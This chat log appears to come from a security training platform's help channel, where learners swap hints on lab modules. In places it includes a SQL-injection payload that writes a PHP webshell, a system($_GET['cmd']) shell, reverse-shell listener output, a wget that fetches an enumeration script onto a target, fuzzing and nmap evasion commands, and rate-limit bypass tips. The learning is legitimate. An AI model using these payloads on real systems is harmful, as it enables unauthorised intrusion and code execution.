This can't be how pentester spend their time on active directory. It should be about hacking it. Not whatever I had read/watch as the starting point.
For whatever reason, I can't seem to point how this is far worse and boring, than when I read about IT. Maybe I was expecting "hacking" on active directory soon. But I just can't bear to read/watch them.
These tutorials I saw in active directory, seem completely different from hours of hours in watching Linux, HTML5, basic web hacking, python3, and etc.

I... need to talk to a real pentester, bug hunter, or even a hacker. I need to get motive again. I know active directory is suppose to be a big deal, but I just can't see it. I tried. But I can't. What.. did I fail to see.

I'm not hacker at all, brand new to it all but yeah I HATED Active Directory stuff. Absolutely mind numbing

@rustic sage try tryhackme throwback

I'm not paying $60 for 30 days use only. Especially after I got discouraged so badly now.

well there are new ad stuff on thm did you check them out

active directory exploitation isn't not necessarily for beginner so you are not going to find much in the beginner stuff

I already read and done almost everything related to thm subscription.

Of course, and that is what I am expecting after doing thm for months now. I'm moving to a more medium level in htb, but that basic I saw when it came to active directory here, and outside of htb, it doesn't made sense to me.

I need to talk to a legit pentester about it.

this is a very big field you are not going to be come a pro hacker just by complete a couple of room on thm

afaik AD is for pivoting

sure wait a bit some there is some pro hacker on this channel

thk. I feel so discouraged. I need to snap out of it. Which channel do u recommend I should visit and ask 1st?

honestly maybe a little break and focus on something else might help you

But eventually I will face AD again soon enough. And I thought reading how to write a pentest report was boring.

learning how to write a report is never gonna be exciting in any field

@rustic sage you complete 15 room on thm... really?

so the zap tutorial for the hud is super useful

still don't know why it's not loading my preconfigured browser though xD

Hi, I'm having trouble with the module on vulnerability assessment:
Specifically the task for nessus.
I configured the scan as described in the task, added the credentials and scanned. I got a report that looks good, but I cant answer any of the questions. E.g. it asks for a certain plugin, but that plugin is not in the report

Where is the pop3 service from?

oh wait wrong section sorry i mean the ||ftp||

AD is just a dry subject on any front. Operation, defense and offensive. I am not sure what bells and whistles you expect from it but when you learn to use it in school it’s literally just massive 800 page textbooks. Also most of AD pentesting and defense is moving into very automated toolsets, so knowing the history is very useful. You have to remember HTB assumes you started learning on their platform.

I'm stuck on Web Reqest - GET module exercise .... I can't find the flag... any hints...

👌 ok

Did you use the hint?

So RL AD pentest & def are mostly automated? I did not know that. If u know a blog, video, or article where how RL pentester used their automated toolset in AD. May u point to me where it is pls?
Lastly, I was already expecting and disliking what htb and thm will present to me with their manual books in their 20th century teaching style.

can i dm you i have the same issue ?

I mean you will need to look into vendors like rapid7 I know is a big one, Crowdstrike has some stuff too. I am not sure why you went in with a mindset of disliking the content, if you did not like it leave the owners a message on what could be improved. However as someone who has their CTT+ and has done trainings I would assume it stays this way because its a 80% coverage shot with their teaching style.

@oblique shale Its like reading "how to write a report". I know I will dislike it, but I'm still going to do it. However the AD basic "how to manual" teaching just doesn't make sense at all to hacking. We are suppose to break and make the system do stuffs it is not suppose too, not renaming objects, or other pointless things "as tasks".
Btw thank for the rapid7 & Crowstrike. Never heard of them before.

Yes, I have seen those files. Do I need to send a reverse shell to connect to the target?

or need download app XAMPP and connect?

Correct me if I am wrong but you are doing the "Introduction to Active Directory" The General category course?

exploit the ||ftp|| that ||run on port 443||

That is correct. I am testing the water with htb before considering subscribing. I read from this blog https://www.hackthebox.com/blog/introduction-to-active-directory, and decided to see the path they recommended.

Ok so this may help you in your learning, their are three categories on the academy, their is General which is essentially IT skills, Defense (blue team) and then Offensive (red team), you are trying to take a learning module from the general category and shove it into expectations of "Hacking or pentesting" which is not at all what that module is for, why not give an offensive module with AD a go?

The general category is general security, IT, cyber not just pure hacking. I think that is maybe why you are upset.

Did u read that blog? Scroll down to the latter half.

The AD Track is an excellent resource for practice. Tracks are curated lists of machines and challenges that users can work on to master a particular topic. This track contains boxes of varying difficulties with various attack vectors. If you cannot yet solve these boxes on your own, you will still learn a lot by following a walkthrough or video. The more you are exposed to AD (and any topic), the more comfortable you will become, and eventually, things that right now may seem completely foreign will become second nature.

I'm not upset in that. Why else did I learned IT in python3, html, & etc. That don't make people hackers. But we do apply it commonly in RL.

that's the foundation

Probably safe to say trudge through the Microsoft essentials crap of the path then you will get into more offensive and educated learning

Hey, can you maybe explain how to?|| I got a user and uploaded files to the site, but they dont execute when i try to run them :/|| 🙂

Not all foundation have a solid ground in RL job. I can see why they chose the name "Academy". In RL, most of it is not practical in job. For exa, a company did not give us a job to spend couple of minutes in manually calculating something repetitive every time doing the same task. Companies have software for that. So we will likely forget about it in the future, and wonder why we even bother learning it and must pass it in exam.

I do not agree with that statement I guess, there is value in learning those fundamentals, some deep level sys admins literally do that kind of stuff so it happens I guess I am just not sure what your expectation was of that course?

i use a ||php payload with powershell|| if you need any help with that feed free dm me

Huh? We are not debating if there is value in any foundation or fundamentals. Don't go off the raid Drachen. Just bec its the foundation, doesn't mean there are no flaw. Just because writing report for the client is important, doesn't mean I can't dislike it, or any important context. Any job will have its up and down.

I mean what is the flaw

I can't find the root submit flag

any idea

for Learn the basics
of Penetration Testing

Okay, thanks! Im done for today, but ill text you next time 🙂 have a nice weekend!

With the Student suscription can I access my finished modules once it is finished?

yes you can revisit any module you complete

Thanks :)

np 🙂

what is the root flag for the first level ? please

Got it ,Thank you bro

Np

hi all, Happy Friday! just a quick update. the Learning Process module has 8 new sections by @drifting knoll

What have you tried and how did you come to those answers?

can someone help me with the last question on https://academy.hackthebox.com/module/143/section/1485 ??

i have this command but it just hangs

in bloodhound it shows "addself" but idk how to convert that to ObjectAceType

what command can i run to see it

@onyx dust DM me 🙂

was tier 0 redeemer new? Haven't been here in a while.

I was sent back to tier 0 from tier 2 cos of it

yea its pretty new

ok thanks

But the nmap says host is up all ports are closed

Has anyone done INFORMATION GATHERING - WEB EDITION
Page 7 Active Subdomain Enumeration

What is the FQDN of the IP address 10.10.34.136?

what am i missing here ?

nslookup -query=PTR <IP>. Does not work even when i use the name server ||ns.inlanefreight.htb||

dig -x 10.10.34.136 ||@ns.inlanefreight.htb|| also does not work

look back at the part 2. Testing for ANY and AXFR Zone Transfer

you need to look at one of the subdomains

Thanks

i'll re-read it

What is the name of the group that is present in the Company Data Share Permissions ACL by default?

hola alguien me podria ayudar con esto llevo casi todo un dia 😦

hello someone could help me with this I've been almost a whole day

can you give me hint on how to find upload directory ?? anyone else for file upload assessment ?

Ahhh ! I figured it out

Got it lol thanks

2 zones here so......

Wow this is a good module

hello guys

Enumerate the hostname of your target and submit it as the answer. (case-sensitive)

hoe can i fine hostnames using nmap? if someone can guide me

nmap -sL

i used -A and it works but thx anyway

hello, anyone who has completed the Command Injection module..!!!

I'm having issues with INFORMATION GATHERING - WEB EDITION Virtual Hosts:

My first step, I set up the following in a file called vhosts to make sure fuff is working before I load in a massive list

app
blog
dev-admin
forum
help
m
my
shop
some
stor
support
www

My second step I ran the following

 ┌─[scientist@Michaels-MacBook-Pro-2] - [~/hacking/wordlists/SecLists/Discovery/DNS] - [Fri Jul 29, 15:41]
└─[$] <git:(master*)> ffuf -w ./vhosts -u http://10.129.42.195 -H "HOST: FUZZ.inlanefreight.htb" -fs 612

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.5.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.42.195
 :: Wordlist         : FUZZ: ./vhosts
 :: Header           : Host: FUZZ.inlanefreight.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 612
________________________________________________

app                     [Status: 200, Size: 103, Words: 3, Lines: 6, Duration: 125ms]
:: Progress: [13/13] :: Job [1/1] :: 18 req/sec :: Duration: [0:00:02] :: Errors: 12 ::

** Things to note: it found ||app.inlanefreight.htb ||I used curl to get flag2 **
** Questions: Why are there 12 errors. **

I went on to try a bigger list nothing showed up, even though app was one of the words in the list. So does this imply i'm using ffuf incorrectly, is this my ISP filtering things ? What am I doing wrong here.

Thanks.

Figured it out

For those of you in the future that may have the same issue wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt --hc 400,404,403 -H "Host: FUZZ.inlanefreight.htb" -u http://10.***.***.*** -t 100

I'm working on NETWORK ENUMERATION WITH NMAP and need help with Firewall and IDS/IPS Evasion-easy lab. If anyone have any knowledge on this module, please pm me.

hello everyone. u know how some modules have hackthebox machines at the end of them? it looks like this (from broken authentication, for example)

are u supposed to do those machines at the end of the module? i haven't been but i was wondering if everyone else is

you use ffuf in the other post and wfuzz in your solution.

You dont absolutely have to but we recommend those boxes and other content at the end in case you want to challenge yourself a step further.

Yeah, fuff wasn't working for some reason I gave up on it and tried wfuzz.

Hi everyone, I am working on network enumeration with nmap / service enumeration. The question is "Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.". I followed the lesson and tried tcpdump and nc in 2 separate tab. The tcpdump never show anything, but the nc show something like this: 220 HTB{xxxxxxxx}. I tried xxxxxxxx in the answer but it said wrong. Can anyone help me with this?

Include the HTB{}

not just what's inside

And don't forget to follow the instructions in the #welcome channel to verify your account and get more rooms opened up :-)

Hey all I’m considering a student subscription when I manage to get some money together. It says instant access to everything up to tier 2, will I have to pay more money in order to have access to tier 3 material?

thanks alot!

anyone? i've got two high risk vulns. one of them looks more promising than the other

Hi guys, I need help in determining how to see if Telnet block login attempts for a set duration of time.

E.g Every 4 login attempts, the Microsoft Telnet server will deny all login attempts for about 5 seconds, before allowing incoming connections again

hello guys, i am at the skills assessment for SQL injection fundamentals, and i can't seem to get the webshell to print out the contents of /

cn' union select "",'<?php system(dir /); ?>', "", "", "" into outfile '/var/www/html/dashboard/shell1.php'-- -

this is the command im using

pwd works

the above command also successfully executes, but then shell1.php is empty

could anyone please help ?

Try putting single quotes for the parameter being past to the system function

system($_GET[‘cmd’]) is more flexible. You can pass your command with the url parameter and dont need to upload a shell for each command

Anyone? I've got the vulnerability but I'm having difficulties exploiting it

u sure it's "High" and not "Medium" ?

100%

it's the url encoding that's throwing me

i know i have to add something to the url it gives me

so here you don't see the content of /etc/passwd ?

Thank you, i will try it now

i do yeah got it here

but i don't see a flag.txt

and u cant read the flag ? or you don't see the flag ?

don't see it

did u read the question carefully ? 😅

that's what i mean. i'm sure i've done the 'hard' part

i'm having a brain fart here

YAR HAR i got it

man i'm dumb

i encoded '/' as '%24' instead of '%2'

well done XD

Hi everyone, I was wondering. I currently have the student subscription and I'm doing a lot of courses. Do I will still have access to all the courses I'm doing/have done ? thx

You can revisit all the finished courses after you finished them. Not sure about when your subscription ends

Yeah that's why I'm asking, it's my first subscription

Likely access will be gone by then

can someone guide me on this without spoiling

and the course will be marked as completed ? if so we would never be able to read it again except by buying another subscription ?

wich module ?

command inj

bypassing blacklisted characters

u can dm if u want, but not sure i remember 🙂

i'm having a rough day. i've edited this html code to click this button 20+ times now and no flag 😢

i'm editing the html then sending to repeater but it's reverting back to disabled. send help

when you say single quotes, do you mean around the dir / command? like 'dir /' ? that doesnt seem to work

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''); ?>', "", "", "" into outfile '/var/www/html/dashboard/shell1.php'-- -%'' at line 1

double quotes did it

thanks!!

np!

Rng is involved ;)

Just have to modify it once

yeah i'm REALLY unlucky... i did it a lOT

Does anyone have a nudge for me on the windows privesc skills assessment 1? I am trying to find the ldapadmin account credentials but have had no luck

GOT IT

hi i'm doing File Upload Attacks and I was wondering why some file extensions like php2, php6 or pht does not work as webbshell and why are we seeing the source PHP code in the source code section of our web browser ? thx

hi everyone , i am stuck at module Login Brute Forcing - Skills Assessment - Service Login , I tried but couldn't find the username & password ssh to the server , I need a hint about the username because I can't find it : ( , please help

it's depend on the technologies the server are using, try different extensions until one works. Also I recommend you to print a echo instead of the cmd, to check which extensions works and then upload the webshell

yeah it was strange to see the php code XD

It just the server doesn't process as a php code, so it send it to you raw

yeah

u tried with the usernames/passwords given in the module ?

I tried the wordlists used in the module

which skill assessment are u on ?

Brute Forcing - Skills Assessment - Service Login

In previous sections they gave you this github https://github.com/urbanadventurer/username-anarchy, try using the info of the other skill assesment

the problem is i cant find any info about username 😦

or a name to be able to run this tool

In the skill assesment website you found a username

username is user ?

i think it was given

as an exemple

to answer this question you must seen a username

if not, do first the website skill assesment

maybe ||harrypotter || password is username ?

close, use this tool to generate a wordlist of usernames

thanks

Hello friends, Has anyone completed challenge #3 of the network enumeration with nmap module where we want to "find out the the version of the running services. I believe it is port 50000 that is running the service ibm-db2. What I have tried so far is "sudo nmap 10.129.2.47 -f -Pn -n -p50000 -v -vv -sSU --source-port 53 -sV -D RND:5" pretty much throwing every evasion method I can, but I am still getting that it is tcpwrapped any help would be greatly appreciated it im 4 hrs in on this challenge.

Can someone helps with File Upload Attacks the section of Type Filters?

yup

DM

Please i need a command to filter this output... i only need the subdomains

trying to connect to MSSQL via PowerUpSQL.ps1 getting a timeout in the Active directory enumeration and attack module

any idea what i'm doing wrong ? I tried on both the WIndows and Linux machine and I can connect properly. I know the creds are right because i can run commands like 'Select @@version' and get a response after a minute or two.

@sharp torrent hey can I dm you I need help in ACTIVE DIRECTORY ENUMERATION & ATTACKS module

have tried other methods to connect to MSSQL?

Hello, I need the help pls with John the ripper to find the hash from one zip file

unzip the file first to know the content

I think is something tricky

Yes but have a look to hint

@cosmic dirge unzip the file Misc_hashes.zip the get the file hashcat.7z your task is to extract and crack the hash from that file not Misc_hashes.zip (also the tool is maybe broken)

I extract the hash

But is not in the correct format how they show to us

@cosmic dirge use > to the new file

he didn't extract the hash that's a error

So I have right

@cosmic dirge use the command unzip Misc_hashes.zip

I done but the hash is long 1 km and is not the correct format

How they show

Don’t have this $pkzip$ on the front and end

because you didn't extract the hash

this is a error not a hash you run tool on the wrong file

GETTING STARTED in the Web Enumeration section there's this IP address that your instructed to go to " https://10.10.10.121/ " & " https://10.10.10.121/ private" neither of which take you anywhere other then "The connection has timed out" page I've refreshed the page and came back and keep getting the same issue. Can someone assist with the problem?#GETTING STARTED

@rain marlin i think its just an example , i tested and get same result on my end

🤦🏾‍♂️ Thank you that makes sense;

no worries 🙂

Have you completed this module?;

yep

Oke …which tool I have to run

Could help guide me in the right direction with this part "Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag." I don't want answers just a little push I visit this IP and theres nothing there to log into

Try running gobuster to discover pages/directories

👍🏾 Thanks

@rain marlin maybe need to add to /etc/hosts first

And after web fuzzing

Could I please get a hint on which user/wordlist to use for the easy lab in the "Password Attacks" module? I've already tried default creds from ihebski's cheatsheet and other ones found in SecLists, also tried different permutations of the wordlist provided under resources and a few other wordlists with common usernames against both the services for a few days but not finding valid creds. Thanks!

@steel kite use the resources files of the module

I did but found nothing, any permutation rules applied to the password list?

the custom rules gives out a 90k list which I brought down to something more manageable and im trying to run against the default username list from the module

Oh sorry, I haven't reach that question yet, was sure you're doing the network services at the beginning of the module.

nope already done that, this is all about the user/pass wordlist used looks like and I'm going crazy 🤪

Dm

Looking for a bit of a nudge on the Firewall and IDS/IPS Evasion Medium Lab

hello i do not find flag for DNS Attack on module ATTACKING COMMON SERVICES. some help ?

Hello I am looking for help on the 'DNS Enumeration Using Python' module.

QUESTION: Perform a zone transfer using the DNS-AXFR.py script against your target for the "inlanefreight.htb" domain and submit the total number of unique subdomains found.

#!/usr/bin/env python3

Dependencies:

python3-dnspython

Used Modules:

import dns.zone as dz
import dns.query as dq
import dns.resolver as dr
import argparse

Initialize Resolver-Class from dns.resolver as "NS"

NS = dr.Resolver()

Target domain

Domain = 'inlanefreight.htb'

Set the nameservers that will be used

NS.nameservers = ['ns1.inlanefreight.htb', 'ns2.inlanefreight.htb']

List of found subdomains

Subdomains = []

Define the AXFR Function

def AXFR(domain, nameserver):

    # Try zone transfer for given domain and namerserver
    try:
            # Perform the zone transfer
            axfr = dz.from_xfr(dq.xfr(nameserver, domain))

            # If zone transfer was successful
            if axfr:
                    print('[*] Successful Zone Transfer from {}'.format(nameserver))

                    # Add found subdomains to global 'Subdomain' list
                    for record in axfr:
                            Subdomains.append('{}.{}'.format(record.to_text(), domain))

    # If zone transfer fails
    except Exception as error:
            print(error)
            pass

Main

if name=="main":

    # For each nameserver
    for nameserver in NS.nameservers:

            #Try AXFR
            AXFR(Domain, nameserver)

    # Print the results
    if Subdomains is not None:
            print('-------- Found Subdomains:')

            # Print each subdomain
            for subdomain in Subdomains:
                    print('{}'.format(subdomain))

    else:
            print('No subdomains found.')
            exit()

hey guys i'm doing the broken auth module, brute force usernames and idk why i get the same output for all users for this question (the hidden input is always the user we tried)

This is my edited code^

yup

yes

Am I missinng something in my code?

what's ur pb

what have u tried

i brute force subdomain with gobuster with all Seclists/Discovery/DNS

i found some subdomain but no flag

zone transfert don't work

can u dm me the domain u found

sure

Bump - anyone able to give me a nudge on windows privesc assessment 1?

NVM i was able to pass my target machine as one of the nameservers and that was the key.... silly me

problem solved thanks @grave dust

Thanks for the input figured it out. Thank you;

Stuck in the same place @vale salmon 🤷🏾‍♂️. I've found what looks to be the version. It's literally listed under version but, the answer I give is incorrect. I'm wondering if it's me or if it's a broken module 🤨

Yeah, I'm pretty confused at this point

@vale salmon I'm taking screenshots and opening a ticket. Sometimes the answer box is finicky. I don't know. I have to move on though. I've lost so much time to this module because of this.

Let me know if you hear something

@vale salmon Just sent all my research in a ticket. I'll let you know how it goes

For anyone searching for help on this in the future feel free to message me. My hint would be to ignore where the question is taking you and focus on methods for privesc. Once you've sorted that, answering the questions is a piece of cake!

@vale salmon nmap medium lab is weird. I just revisited it and used the exact same command as in my documentation but got a different result. I haven't been able to find a command that yields the flag.

Huh. That is weird.

Disregard, I figured it out.

~~Is there a problem with Nibbles? I'm on the Initial Foothold section and I can't get my reverse shell to stay open. I've uploaded the php file to the target website and I've gone over the line of code within it multiple times to make sure it's correct. But when I open up a netcat listener on my machine and then try to establish the reverse shell, I get the following:

Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::54321
Ncat: Listening on 0.0.0.0:54321
Ncat: Connection from 10.129.8.210.
Ncat: Connection from 10.129.8.210:35348.
/bin/sh: 0: can't access tty; job control turned off
$

And then it just returns me to my normal input line.~~

If you are referring to the NMAP - Firewall IDS/IPS Medium chapter, if you are seeing a version number, then you are not getting the correct answer. It'll be a flag. Try ||checking out the DNS nmap scripts.||

What would be the right channel to get help troubleshooting the error I'm running into trying to connect to the starting point vpn?

@pine dagger Your response is redacted lol. Be careful not to give anyone exact answers. Judges are okay. I found something VERY strange while enumerating this target. I'll try that as my answer. If that IS the answer, I'll be kinda disappointed in HTB for being "off track" with their specific question and specific answer.

@hybrid flax click the help box when you're log into HTB. It'll give you article/discussion recommendations. If you're still stuck after that, you can submit a help ticket to tech support

@pine dagger Nudges* are okay. And you gave me a nudge. I'll have to try again when I get the chance and let you know how it turned out

#starting-point

What addressing mechanism is used at the Link Layer of the TCP/IP model? Did anybody get this answer under "Intro to Network Traffic Analysis" module? I tried "MAC addressing" but it isn't working

@pine dagger I've tried various scripts, to no avail. I thought for sure the ||dns-nsid|| script would work, but I'm not getting the flag and am unsure why.

need help: INFORMATION GATHERING - WEB EDITION
Information Gathering - Web - Skills Assessment

Perform active subdomain enumeration against the target githubapp.com. Which subdomain has the word 'elephants' in the name?

i downloaded and ran sublist3r found a bunch of sub domains but non with elephants in the name

anyone give me a nudge

@rustic sage Are you using the right nameserver?

probably not... im just ran it with githubapp.com

You can also use -o file and then grep the file for elephants

ill try that after i run the right name server

HELLO EVERYONE

I WANNA LEARN HECKING

i can no find the right tamper to pass the sqlmap final assessment minishop

can anyone give me some hint?

keep getting syntax error

but i can figure out what was filter out

This question?

yes

i think i have already find which parameter to try

||id||

but dont know how to go further

@wind plaza Are you using burpsuit to capture packages?

There is a specific packet you have to capture to solve that exercise

yes

get it from shop

add to cart

Then sqlmap should tell you which settings to use

If you look at the end of the command running it'll tell you which tamper they suggest to use

That should be enough to get through 😐

ok, i'll tru it

try

btw, am i getting the right package

Yeah

It was either adding to cart (80% sure) or purchasing (20% likely)

anyone around finish attacking common services?

im a big noob, can someone explain what the backslash function is in this command? "smbclient \\10.129.1.12\WorkShares"

Anyone able to help on Windows Privilege Escalation assessment part 2? Everything tells me it should be vulnerable to an exploit that was run through in the course. I run the exploit in the same manner and with the same .exe used in the course (firefox related) and it seems to work, but I don't then have the required access to copy the malicious .exe.

https://en.m.wikipedia.org/wiki/Path_(computing)#UNC

thank you so much!

still cant get the sqlmap final

i get different response on -v 6 when I use -d='{"id'=1'} and -r request.file

and I dont know why

-d will give me html of entire page, -r will give syntax error

...you know I redacted it myself right? You just click on the text to reveal what I wrote.

DM me

Hi fellows!
I’m tying to solve the Firewall and IDS/IPS Evasion - Medium Lab of Network enumeration where the challenge is to find the DNS server version

I have nmap and found filtered ports and opened ports

Can anyone help? Thx!

alright then 😂

Consider which protocol DNS uses by default.

Perfect great! Thanks @acoustic owl

I may need help on Broken auth, Predictable reset token. i think i got the thing but i'm doing something wrong

See my response about 9 hours ago to UnderTheRadar 🙂

Hi one help needed in windows fundamental module
Skill Assessment Q.How to get the
SID of HR group

Already tried whoami /? GROUPS
But no luck. Not getting HR group name nor its SID

DM

hy man, i'm stuck in "Using Web Proxy" module on question "Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)". i do all the reverse hashing but got always the same size of the response.... can anyone help me please??

solved

Am really enjoying the labs atm. Tier 2 is definitely a lot more fun 🙂

Can someone assist?

@unique valve Hello, I currently have a student subscription. After finishing all the modules that are available to me, and after finishing my university ( I will no longer be a student ), will I get to keep the access to the modules or I won't be able to access the completed modules ?

Oh lol. No. I didn't know that. I didn't even we could do that. That's cool 🙂

Please, can someone help me with the File Inclusion Skills Assessment?

||I injected the php shell by log poisoning in the admin panel but it is not executing the commands||

@drifting knoll FYI, Loved the OSINT: Corporate Recon Module, sadly Rapid7 are not currently approving requests from individual researchers or bug bounty participants to their Forward DNS datasets i.e. (FDNS)2022-07-30-1659149393-fdns_txt.json.gz 😦

<@&861185840277487616>

There is a Rust scam above

Its so that people can share hints, without people getting spoiled. Still cant be too specific, but hopefully it will get you on the right track.

thank you

Dm if you still need help

It's in #613049811481919508 too

I remember this one, be very particular about whether you're using single quotes or double quotes.

Hi guys!

Skill Assessment - Broken Authentication from the "Broken Authentication" module.

1. Selected users.
2. Filtered passwords.
3. Stuck, ((
   how to phase passwords bypassing Rate Limiting?
   Do you need a working script here?
   Or Burp forces can do it.
   ||The X-Forwarded-For substitution trick:||
   Unfortunately, it did not pass.(
   I will be glad of any advice.
   Thanks.

thx, yea i saw that. they changed their Open Data terms and conditions

heay guys in "broken auth" in "bruteforceing cookie" i tampered the cookie by modifying the role (that i'm 99% sure it's the right one) but get this ?

after you filter the rockyou wordlist it should be down to ||50 or lower password|| and i recommend you use burp intruder and set a 25 second delay between each password try

what role did you change it too?

||super||

and what's strange is by just changing that or by changing the user too i get the same message

i just give it a try and it's working fine for me

can you dm the cookie that you use for this

shure

I'm looking for this option in Intruder, could it be that new versions don't have it?

no burp always have this especially the new versions

what is its exact name in the options?

in burp intruder tab click "Resource Pool" and choose "Create new resource pool" give it a name set the Delay between requests to 25 second in millisecond

someone solved the "Comparison Operators" part on the bash modules? idk what operator i should use and i been 3 days in it

@bleak willow DM me 🙂

ty ❤️

@vital adder In, what you need, thank you!!!

God... I hate Active Directory ... Do I have to know this stuff...

Hello everyone hope you've spent a good week-end, I am currently stuck on the section "DNS" of "Footprinting module" and on the last question it is asked :
"What is the FQDN of the host where the last octet ends with "x.x.x.203"?", I took every hint on the forum and I am still stuck.

What I tried : I got both the main zone transfer and the subzone "internal" in a txt file

like here

and I tried to dig and dnsenum methodically but there is surely something I didn't get and I don't know what it is

I'm having issues on the Bloodhound module with Sharphound giving different values for the quantity of users

I'm having a hard time connecting to the box in the first place with xfreerdp so I'm suspicious that the performance issues are impacting the Sharphound collection

@fair mesa DM me 🙂

Any Help with Web Attacks Skills Assessment, after finding the flag.php.log, I get the flag, but it seems to be the same as earlier assignment, and not working

Nibbles - Privilege Escalation:

I can't get the reverse shell to pull in LinEnum.sh. I have it installed on my attacking machine, but for some reason when I try to pull it in through the reverse shell, I get the following:

Connecting to 10.10.15.227:8080... connected.
HTTP request sent, awaiting response... 404 File not found
2022-07-31 14:47:42 ERROR 404: File not found.

I'm thinking it maybe has something to do with where LinEnum was installed, but that's a really shaky theory and it's all I've been able to come up with.

how are you trying to trasnfer LinEnum.sh ?

wget http://<your ip>:8080/LinEnum.sh

I have my python server set up on my attacking machine, using port 8080

I don't understand what's going on. I installed LinEnum on my attacking machine, but for some reason the target can't find it to bring it back.

It is around 76% of the desktop market, so to answer your question, yes.

Has Anyone Completed Web Attacks - Skills Assessment

I spent half and hour doing the skills assesment of Server-Side attacks and the flag is right in front of you

that seems...comforting

Web Attacks Skills Assessment, why can I not enumerate users by changing the UID, what am I missing?

Hey, Thanks for your patience on this reply. You will retain access to all the modules you completed 100%. If you are using a school email account you may want to consider adding an additional personal email as a backup in case you lose access to your school issued email sometime in the future.

change the request to ||GET||

Getting the same issues, nothing changes when I try to change the UID:

This was easily my least favorite skill assessment, it feels like it should be the skill assessment for another one of the courses.

@tiny ledge oh wait sorry i misread question that's not where you enum user UID

check in ||burp sitemap||

I feel this deep in my soul

what is the longest module you've done so far? i'm doing active directory enumeration & attacks and so far it's the longest one

oh yes

moood

it's 43% market share so yes u have to know it.

So far, in terms of how long it took me, the NMAP module took me the longest, but it turns out it was an issue with using my local box instead of Pwnbox. That happens every once in awhile.

powershell is so awful

active directory too. just as a system it's bad because it's too verbose and overly complex for no reason

i think that's what is making it take longer - the experience is unpleasant since the system is so boring awfully verbose and not in a good way.

section 28 of 36 and it seems 36 sections to a module is above average

even in the training it reflects the verbose nature of the bad system

THIS is what I mean with modules being finicky sometimes 🤦🏾‍♂️🙄. I always wonder if it's an issue created by me using my box. I hate using pwnbox lol. I actually prefer Kali to Parrot and I like that all my settings and preferences stay with my VM.

@vale salmon Support reviewed my research and screenshots. Turns out, I'm just wrong in my answer. I haven't checked if it's this weird flag I found while enumerating at a different point or not lol. That's probably what it is 🙄🤦🏾‍♂️😁

Has anyone done shells & Payloads? The connection with nomachine keeps timing out. Any advice?

Would it be better to do the bug bounty path on Academy and then immediately start bug hunting or would you keep training on HTB until I am comfortable with easy and intermediate boxes in actual HTB VIP?

You can always do both, I'd personally pick a target and work your way through the path, and practice what you learn at the same time that way your actively practicing what you learn(paying attention to the scope of course) I'd keep training on HTB Academy no matter what, the content is invaluable whether your a beginner or experienced. In this field, there is always something to learn for everybodies skill set, and feeling uncomfortable is something that everyone feels, the most important/hardest thing is actually 'starting'.

Ok

Is bug bounty path enough to start bug hunting tho and start making decent money?

I’m doing THM and HTB Academy

Would doing Pentesterlab be worth it once I get past bug bounty path?

Or once I complete THM learning paths?

@vale salmon @rigid sonnet@pine dagger I'm so pissed off that I couldn't get the flag simply because I wasn't using pwnbox. I've been enumerating for DAYS trying way too hard to finish this lab. I decided to try in pwnbox just to see and it took me 30 seconds to get the flag 🙄🙄🙄

Yep, that's exactly what happened to me, too

@vale salmon I tried it after reading your comment about the same. What made you finally decide to try it in pwnbox?

Honestly? A hunch. It isn't the first time that has happened to me, although it is relatively uncommon.

you all talking about nmap medium lab?

Yep

@vale salmon Super uncommon for me too. My own Kali VM can get everything done 99% of the time and the other times I MUST go through pwnbox. It's annoying. And rare. But super annoying when in does happen.

@west canopy Yep

Agreed. Last time it was the Windows Server section of the Windows Privilege Escalation Module.

i want to compare notes on medium lab , mind if i DM?

@vale salmon I can't even get the Windows module to load properly. I guess I'll use pwnbox for that one too 😁

Sure

@west canopy just type it out here 😉. That way ANYONE who can help can chime in

its pretty spoilery though

i'm sitting on some juicy stuff

@west canopy Damn. I don't know how to redact lol

🙏 🙏 Windows Priv Esc assessment 2 any help please 🙏 🙏

Ok - so as with the first assessment I ended up figuring it out after banging my head against a wall for many hours. Anyone in need of future help for skills assessment 2 feel free to reach out. I would say for answering Q2 you do need to execute an exploit explicitly walked through in the module, but pay very close attention to using full/absolute paths when doing the exploit and pay attention to x86 vs x64 differences.

And the LinEnum.sh is in the same folder where you started that server?

And the IP is the proper one? Check with ifconfig. If you use vpn, the tun0 IP.

hi, i'm in the same problem. Were you able to solve it?

Hey guys does anybody of you finished Linux Privilege Escalation? I am Stuck at Flag 4. I found the credentials for the Tomcat login but don‘t know where to log in. I tried http://localhost:8080/manager/html but Firefox says that it is not possible to establish a connection to server. I don‘t get the possibility to enter credentials. Any Help is very welcome

Can someone help me with the Footprinting module in the SMB section. I can’t get the answer to the question: What is the full system path of that specific share? I hope someone can help me with that.

Hi, can you please tell me, what variable i should write out in "Tcpdump Fundamentals", question "Were absolute or relative sequence numbers used during the capture?"
"yes" and "no" doesn't apply

Try "True" and "False"

none 😦

I could use some serious assistance on server side attacks ssti example exploitatin 2. I cant install tplmap because i get an error back saying pip is deprecated and i cant use it on the pwnbox either. i tried the command from the excercise ./tplmap.py -u 'http://ip:port/jointheteam' -d email=bleh but i get no such file or directory. i tried using locate tplmap.py and same thing just get an error. Or if someone could help me with setting up a tornado payload cause i have no idea what the documentation provided is trying to say.

Oh sorry, went and checked. You answer "Absolute" or "Relative"

Yahoo, thanks

how to know host name with nmap?

anyone completed the "Using the Metasploit Framework" module? needed to get some clarification on the following question: "Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer."

What clarification do you need?

